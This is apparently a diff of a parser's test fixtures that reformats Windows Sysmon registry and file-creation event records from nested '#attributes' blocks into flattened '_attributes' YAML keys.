TimeCreated_attributes: + SystemTime: "2019-08-03T12:08:13.818381Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: "\"C:\\Windows\\system32\\cmd.exe\"" EventType: SetValue @@ -2149,30 +1935,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 5132 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-08-03T09:46:48.726304Z" + TimeCreated_attributes: + SystemTime: "2019-08-03T09:46:48.726304Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: EventType: DeleteValue Image: "C:\\Windows\\explorer.exe" @@ -2187,30 +1969,26 @@ Event: Correlation: ~ EventID: 12 EventRecordID: 5135 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 12 - TimeCreated: - "#attributes": - SystemTime: "2019-08-03T09:46:49.436856Z" + TimeCreated_attributes: + SystemTime: "2019-08-03T09:46:49.436856Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: (Empty) EventType: SetValue @@ -2226,30 +2004,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 5272 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-08-03T10:14:02.929209Z" + TimeCreated_attributes: + SystemTime: "2019-08-03T10:14:02.929209Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: "C:\\Windows\\system32\\cmd.exe" EventType: SetValue @@ -2265,30 +2039,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 5273 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-08-03T10:14:02.934826Z" + TimeCreated_attributes: + SystemTime: "2019-08-03T10:14:02.934826Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: EventType: DeleteKey Image: "C:\\Windows\\explorer.exe" @@ -2303,30 +2073,26 @@ Event: Correlation: ~ EventID: 12 EventRecordID: 5278 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 12 - TimeCreated: - "#attributes": - SystemTime: "2019-08-03T10:14:08.681363Z" + TimeCreated_attributes: + SystemTime: "2019-08-03T10:14:08.681363Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CreationUtcTime: "2019-08-03 10:51:46.599" Image: "C:\\Windows\\explorer.exe" @@ -2341,30 +2107,26 @@ Event: Correlation: ~ EventID: 11 EventRecordID: 5305 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 11 - TimeCreated: - "#attributes": - SystemTime: "2019-08-03T10:51:46.647421Z" + TimeCreated_attributes: + SystemTime: "2019-08-03T10:51:46.647421Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: "c:\\Windows\\SysWOW64\\notepad.exe" EventType: SetValue @@ -2380,30 +2142,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 5664 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-08-04T08:56:16.650581Z" + TimeCreated_attributes: + SystemTime: "2019-08-04T08:56:16.650581Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: "C:\\Windows\\system32\\cmd.exe" EventType: SetValue @@ -2419,23 +2177,21 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 5698 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-08-04T09:10:29.060588Z" + TimeCreated_attributes: + SystemTime: "2019-08-04T09:10:29.060588Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event"